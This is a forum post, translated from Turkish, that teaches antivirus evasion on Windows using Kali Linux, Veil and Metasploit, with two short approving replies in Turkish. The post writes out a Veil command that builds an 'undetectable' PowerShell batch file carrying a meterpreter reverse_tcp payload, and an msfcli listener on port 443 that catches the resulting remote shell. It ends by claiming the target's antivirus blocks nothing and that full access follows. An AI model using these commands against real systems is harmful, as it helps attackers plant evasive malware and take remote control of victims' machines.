How to Bypass antiviruses running on Windows OS' using Kali Linux


Özel Üye
3 Haz 2011
KKTC, Lapta
In penetration tests often times a need to bypass antivirus programs appear. Using various encoding methods antiviruses can be bypassed. With programs such as Msfpayload, Msfencode and Msfvenom
creating various malwares with many features is possible. Below we are going to show you how to do this with an alternative and equally successful application called VEIL.

To create a batch file that can bypass the antiviruses on the Windows OS all we need for it to do is run the following commands. Access will be provided to the IP on the 443rd Port by establishing a reverse connection.

Using the command below we can create a batch file. When the command has been executed our .bat extension malware will be created.

root@kali:# veil -l powershell -p VirtualAlloc -o undetectable --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST= LPORT=443



Before running the batch file on windows we will take the 443 port into listening mode.

443 port with the following command has been taken into listening mode with ****sploit. reverse_tcp has been used as payload.

root@kali:# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST= LPORT=443 E


We're running the undetectable.bat on Windows. When we start it the meterpreter shell greets us.


You can see below that the malware infected systems antivirus has done no blocking.

And with this bypassing the systems antivirus and gaining maximum level access is accomplished.

Translated from Shadow-mavi's thread. - /// Windows işletim sistemleri üzerinde çalışan antivirusleri atlatma ///Kali Linux:)
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Yaşayan Forum Efsanesi
6 May 2008
sen yeminle harika birisin babacanım:) eline yüregine sağlık başarılar dilerim ve gerçekten iyi düşünmüşsün babacanım:)

Veteran 7

El Patrón
26 Ara 2011
Eline sağlık Docok forum makalelerini ingilizceye çevirip yayınlayan ilk seni gördüm sanalda :) Güzel çalışma
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